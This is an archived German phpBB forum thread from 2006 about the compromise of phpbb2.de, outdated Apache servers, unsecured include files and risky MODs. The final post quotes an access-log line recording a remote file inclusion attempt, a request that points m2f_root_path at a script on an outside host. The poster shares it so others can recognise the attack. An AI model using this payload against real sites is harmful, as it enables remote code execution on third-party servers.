phpbb2 hacked ???
phpbb2 hacked ???
Habe eben versucht phpbb2 abzurufen und das Ergebnis ist nicht sonderlich erfreulich.
http://www.phpbb2.de
Hoffentlich erfahren wir, wie das passiert ist. Da war doch der cracker tracker installiert, oder??
edit:// so nebstbei hab ich nämlich seit gestern auch wieder eine mittlere Angriffswelle (keine Vergleich zu oxpus oder cback, aber dennoch genug für meine kleine Seite.
http://www.phpbb2.de
Hoffentlich erfahren wir, wie das passiert ist. Da war doch der cracker tracker installiert, oder??
edit:// so nebstbei hab ich nämlich seit gestern auch wieder eine mittlere Angriffswelle (keine Vergleich zu oxpus oder cback, aber dennoch genug für meine kleine Seite.
Zuletzt geändert von diegoriv am Di 18.Jul, 2006 07:31, insgesamt 1-mal geändert.
[center]***********************************************************
Alpinum.at - Forum f?r Bergfreunde
***********************************************************[/center]
Alpinum.at - Forum f?r Bergfreunde
***********************************************************[/center]
- oxpus
- Administrator
- Beiträge: 28737
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Nun, der alte Apache ist vom Provider entgegen der Bestellung installiert worden(!), der Rest ist Stephan gewesen, der nicht gehört hatte...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
[quote="cback";p="61935"]Jo aber ungesicherte Include Files und veralteter Apache.
[/quote]
Wie kann ich die sichern? per .htaccess oder gibts im ctracker noch ne Einstellung die ich übersehen habe. Bis auf die phpVersion die noch bei 4.1.1 liegt ist bei mir alles grün.
[/quote]
Wie kann ich die sichern? per .htaccess oder gibts im ctracker noch ne Einstellung die ich übersehen habe. Bis auf die phpVersion die noch bei 4.1.1 liegt ist bei mir alles grün.
Zuletzt geändert von KaptnIGLO am Di 18.Jul, 2006 10:53, insgesamt 1-mal geändert.
- oxpus
- Administrator
- Beiträge: 28737
- Registriert: Mo 27.Jan, 2003 22:13
- Wohnort: Bad Wildungen
- Kontaktdaten:
Schau mal in Cbacks Blog (Link in seiner SIG). Dort ist alles beschrieben.
Und mein Motto:
Traue keinem MOD, der nicht regelmässig aktualisiert wird, sofern er etwas komplexer ist.
Ich habe daher auch schon so manchen MOD des Boards verbannt; die KB allen voran, da sie neben zahlreichen Bugs auch noch sehr viele Sicherheitslücken hat. Und sooooo dringend brauchte ich die auch nicht
Und mein Motto:
Traue keinem MOD, der nicht regelmässig aktualisiert wird, sofern er etwas komplexer ist.
Ich habe daher auch schon so manchen MOD des Boards verbannt; die KB allen voran, da sie neben zahlreichen Bugs auch noch sehr viele Sicherheitslücken hat. Und sooooo dringend brauchte ich die auch nicht
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
-={ Das Mädchen für alles }=-
Kein Support per Messenger, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per Messenger, Email or PM. Each unasked message will be ignored!
Öhm o.O Root Server!
Mit Debian sogar?
Wieso dann hoster anschreiben?
Rein in die Konsole,
fertig
Bzw apt-get update glaub ich für ein Updatevorgang müsste man mal den dafür verwendeten Befehl gucken, bin kein Debian Anwender.
Mit Debian sogar?
Wieso dann hoster anschreiben?
Rein in die Konsole,
Code: Alles auswählen
apt-get install apache2-mpm-prefork libapache2-mod-perl2 libapache2-mod-php4 mysql-client-4.1 mysql-server-4.1 libmysqlclient10 libmysqlclient12 libmysqlclient14 php4 php4-cgi php4-cli php4-pear php4-mysql phpmyadmin php4-gd libgd2
fertig
Bzw apt-get update glaub ich für ein Updatevorgang müsste man mal den dafür verwendeten Befehl gucken, bin kein Debian Anwender.
Zuletzt geändert von cback am Di 18.Jul, 2006 15:41, insgesamt 2-mal geändert.
- Dungeonwatcher
- Beiträge: 1055
- Registriert: Sa 19.Feb, 2005 01:16
- Wohnort: Berlin
- Kontaktdaten:
Hi große Meister!
Heute gab's doch tatsächlich diverse Versuche mein Forum mit Hilfe dieses Mods zu hacken. Da ich dieses Modul jedoch nicht nutze, gab's nur 404er Meldungen zurück.
Bye/2
Heute gab's doch tatsächlich diverse Versuche mein Forum mit Hilfe dieses Mods zu hacken. Da ich dieses Modul jedoch nicht nutze, gab's nur 404er Meldungen zurück.
Die Profis mögen sich mal diese Seite anschauen, welche versucht wurde aufzurufen.90.Red-81-35-151.dynamicIP.rima-tde.net - - [03/Aug/2006:07:42:55 +0000] "GET /forum/m2f/m2f_forum.php?m2f_root_path=http://xargonu.evonet.ro/htl.html? HTTP/1.0" 404 - "" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.0.1) Gecko/20020823 Netscap"
Bye/2